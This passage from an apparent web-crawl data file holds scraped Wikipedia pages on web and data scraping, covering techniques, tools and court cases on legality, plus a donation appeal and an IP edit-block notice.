settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
508 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-5 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
509 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-6 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
510 | https://en.wikipedia.org/wiki/Web_scraping | https://donate.wikimedia.org/wiki/Special:FundraiserRedirector?utm_source=donate&utm_medium=sidebar&utm_campaign=C13_en.wikipedia.org&uselang=en | Thank you for considering a donation to the Wikimedia Foundation. We invite you to reflect on the number of times you visited Wikipedia in the last year. If the knowledge you gained here was valuable, please join the 2% of readers who donate. Any amount helps: 200, 500, 750 pesos, or whatever feels right to you today. In the age of AI, access to verifiable facts is crucial. Wikipedia is at the heart of online information, powering everything from your personal searches to emerging AI technologies. Your gift strengthens the knowledge of today and tomorrow. If Wikipedia has given you useful knowledge this year, please give back. There are no small contributions: every edit counts, every donation counts. Thank you. Technology: Servers, bandwidth, maintenance, development. Wikipedia is one of the top 10 websites in the world, and it runs on a fraction of what other top websites spend. People and Projects: The other top websites have thousands of employees. Wikimedia Foundation has about 700 staff and contractors to support a wide variety of projects, making your donation a great investment in a highly-efficient not-for-profit organization. Tax deductibility information We do not sell or trade your information to anyone. By donating, you agree to share your personal information with the Wikimedia Foundation, the nonprofit organization that hosts Wikipedia and other Wikimedia projects, and its service providers pursuant to our donor policy. Wikimedia Foundation and its service providers are located in the United States and in other countries whose privacy laws may not be equivalent to your own. For more information please read our donor policy. For recurring donors, fixed monthly payments will be debited by the Wikimedia Foundation on the monthly anniversary of the first donation, until such time as you notify us to discontinue them. Donations initiated on the 29, 30, or 31 of the month will recur on the last day of the month for shorter months, as close to the original date as possible. For questions, please contact donate wikimedia.org. |
511 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=17 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
512 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:United_States-centric | The pages listed below have been identified as containing information specific to the United States of America without adequately covering differences found in other parts of the world. If you find a whole article, or a section of an article, that needs to be globalized, you can put it in this category by adding either: The following 200 pages are in this category, out of approximately 1,678 total. This list may not reflect recent changes. |
513 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-25 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse 